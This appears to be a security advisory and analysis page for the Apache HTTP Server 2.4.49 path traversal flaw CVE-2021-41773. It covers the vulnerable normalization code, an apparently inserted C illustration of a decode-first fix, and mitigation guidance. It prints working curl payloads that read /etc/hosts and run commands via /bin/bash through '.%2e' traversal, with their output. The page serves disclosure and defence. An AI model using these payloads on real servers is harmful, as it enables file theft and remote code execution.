Attacker Value: High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: None
Privileges Required: None
Attack Vector: Network

CVE-2021-41773

Disclosure Date: October 05, 2021
Exploited in the Wild
MITRE ATT&CK tactic: Initial Access
Validation: Validated

Description

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration “require all denied”, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.


CVSS V3 Severity and Metrics

Base Score: 7.5 High
Impact Score: 3.6
Exploitability Score: 3.9
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): None
User Interaction (UI): None
Scope (S): Unchanged
Confidentiality (C): High
Integrity (I): None
Availability (A): None

General Information

Vendors

  • Apache Software Foundation

Products

  • Apache HTTP Server


Technical Analysis

Threat status: Threat
Attacker utility: Info leak, remote code execution

Description

On October 4, 2021, Apache HTTP Server version 2.4.50 was released with a patch for CVE-2021-41773, an unauthenticated and remote file disclosure vulnerability. The vulnerability arises from the mishandling of URL-encoded path traversal characters in the HTTP GET request. An attacker can read files outside of the server root directory by sending a specially crafted request.

Public exploits are available, and the vendor reports that the vulnerability has been exploited in the wild. For more information, see Apache’s advisory.

Affected products

  • Apache HTTP Server version 2.4.49
  • Apache HTTP Server version 2.4.50

Rapid7 analysis

The vulnerable code is in server/util.c within the ap_normalize_path function. This function attempts to resolve URL-encoded values and remove path traversal logic from the requested URI. The vulnerability is the result of resolving URL-encoded values one character at a time and attempting to detect traversal logic before all characters have been decoded.

The following is a snippet of the vulnerable code in server/util.c, lines 561 – 596:

if (path[l] == '.') {
    /* Remove /./ segments */
    if (IS_SLASH_OR_NUL(path[l + 1])) {
        l++;
        if (path[l]) {
            l++;
        }
        continue;
    }

    /* Remove /xx/../ segments */
    if (path[l + 1] == '.' && IS_SLASH_OR_NUL(path[l + 2])) {
        /* Wind w back to remove the previous segment */
        if (w > 1) {
            do {
                w--;
            } while (w && !IS_SLASH(path[w - 1]));
        }
        else {
            /* Already at root, ignore and return a failure
             * if asked to.
             */
            if (flags & AP_NORMALIZE_NOT_ABOVE_ROOT) {
                ret = 0;
            }
        }

        /* Move l forward to the next segment */
        l += 2;
        if (path[l]) {
            l++;
        }
        continue;
    }
}

When an attacker uses /.%2e/ in a URI, the logic on line 572 will not recognize %2e as a period because the character has not yet been decoded. Normally, to fix such an issue, the developers would decode the entire URI at once and then scan for path traversal logic. Rapid7 analysts note that Apache did not take this approach.
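The decode-first approach described above, as an added illustration rather than Apache's own code (`pct_decode` and `normalize_decoded_path` are hypothetical helpers): the whole URI is percent-decoded before any dot-segment check runs, so `.%2e` is seen as `..` and rejected exactly as a literal `..` would be.

```c
#include <ctype.h>
#include <stdlib.h>
#include <string.h>
/* Percent-decode src into dst (dst needs no more room than src). Returns 0 if
 * an escape decodes to NUL, which would silently truncate the path. */
static int pct_decode(const char *src, char *dst) {
    while (*src) {
        if (src[0] == '%' && isxdigit((unsigned char)src[1]) &&
            isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], 0 };
            int c = (int)strtol(hex, NULL, 16);
            if (c == 0) return 0;
            *dst++ = (char)c;
            src += 3;
        } else {
            *dst++ = *src++;
        }
    }
    *dst = 0;
    return 1;
}

/* Decode the whole URI first, then collapse "." and ".." segments, so an encoded
 * dot cannot hide a traversal. Returns 1 with the result in out, 0 if ".." passes the root. */
int normalize_decoded_path(const char *uri, char *out, size_t outlen) {
    char decoded[1024];
    if (strlen(uri) >= sizeof decoded || outlen < 2) return 0;
    if (!pct_decode(uri, decoded)) return 0;
    size_t w = 0;                       /* bytes written to out */
    for (const char *p = decoded; *p; ) {
        while (*p == '/') p++;          /* skip empty segments */
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 1 && seg[0] == '.') continue;           /* drop "/./" */
        if (len == 2 && seg[0] == '.' && seg[1] == '.') {  /* handle "/../" */
            if (w == 0) return 0;                          /* already at root */
            while (out[--w] != '/') { }                    /* drop previous segment */
            continue;
        }
        if (w + 1 + len >= outlen) return 0;
        out[w++] = '/';
        memcpy(out + w, seg, len);
        w += len;
    }
    if (w == 0) out[w++] = '/';
    out[w] = 0;
    return 1;
}
```

Fed the PoC path from this page, the function returns 0 (rejected) because the decoded `..` segments climb past the root; a benign `/cgi-bin/./foo/../bar` normalizes to `/cgi-bin/bar`.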

A simple curl proof of concept follows:

albinolobster@ubuntu:~$ curl -v --path-as-is http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hosts
*   Trying 127.0.0.1:80...
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/hosts HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Tue, 05 Oct 2021 16:54:39 GMT
< Server: Apache/2.4.49 (Unix)
< Last-Modified: Mon, 04 Oct 2021 19:00:13 GMT
< ETag: "dd-5cd8b85df5c38"
< Accept-Ranges: bytes
< Content-Length: 221
<
127.0.0.1    localhost
127.0.1.1    ubuntu

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
* Connection #0 to host 127.0.0.1 left intact

The vulnerable code was introduced in a 2020 commit, but only made its way into one official release. The HTTP server is only affected when the configuration file is either missing the directory directive for the entire filesystem (e.g. <Directory />) or the filesystem directory directive contains Require all granted. Note that the default configuration of HTTP Server contains a filesystem directory directive containing Require all denied, and is therefore not vulnerable.

Rapid7 researchers examined default Apache configurations packaged with some popular Linux distributions, but none appear to be vulnerable by default. There may be some third-party products using vulnerable configurations, but since the vulnerability is limited to one version of HTTP server, we don’t expect exploitation to be widespread.

Updates

October 5, 2021: On the evening of October 5, 2021 @hackerfantastic posted a proof of concept demonstrating remote code execution using this vulnerability. Remote code execution is possible only when mod_cgi is enabled. Again, mod_cgi is not enabled in the default Apache Server HTTP configuration, but it isn’t an uncommon feature to enable either.

When mod_cgi is enabled, an attacker can execute arbitrary programs via HTTP POST requests. While the initial RCE proof of concept resulted in blind command execution, there have been multiple proofs of concept that coerce the HTTP server into sending the program’s output back to the attacker. We believe the simplest method uses echo -e "\n$(commands)" in the POST body:

albinolobster@ubuntu:~$ curl -v -d 'echo -e "\n$(id)"' http://127.0.0.1/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/bash
*   Trying 127.0.0.1:80...
* Connected to 127.0.0.1 (127.0.0.1) port 80 (#0)
> POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1
> Host: 127.0.0.1
> User-Agent: curl/7.74.0
> Accept: */*
> Content-Length: 17
> Content-Type: application/x-www-form-urlencoded
>
* upload completely sent off: 17 out of 17 bytes
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Wed, 06 Oct 2021 10:16:13 GMT
< Server: Apache/2.4.49 (Unix)
< Transfer-Encoding: chunked
<
uid=1(daemon) gid=1(daemon) groups=1(daemon)
* Connection #0 to host 127.0.0.1 left intact

Useful exploitation is more difficult on Windows as it’s less conducive to one liners like Unix-like systems. However, Will Dormann did post a tweet that demonstrated popping calc.exe using this vulnerability.

October 7, 2021: On October 7, Apache updated their advisory to note that the patch for CVE-2021-41773 was incomplete, rendering HTTP Server 2.4.50 versions vulnerable when specific, non-default conditions are met. According to their advisory, “an attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration require all denied, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution.”

CVE-2021-42013 has been assigned to track the incomplete fix for CVE-2021-41773. CVE-2021-42013 has been fixed in HTTP Server version 2.4.51 released October 7, 2021. For more information, see Apache’s advisory.

This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.

Guidance

Organizations should determine if they are using Apache HTTP Server 2.4.49 or 2.4.50 and if they are using vulnerable configurations. If a vulnerable server is discovered, the server’s configuration file should be updated to include the filesystem directory directive with require all denied:

<Directory />
    Require all denied
</Directory>

Upgrade to HTTP Server 2.4.51 or later as soon as possible. For more information, see Apache’s advisory.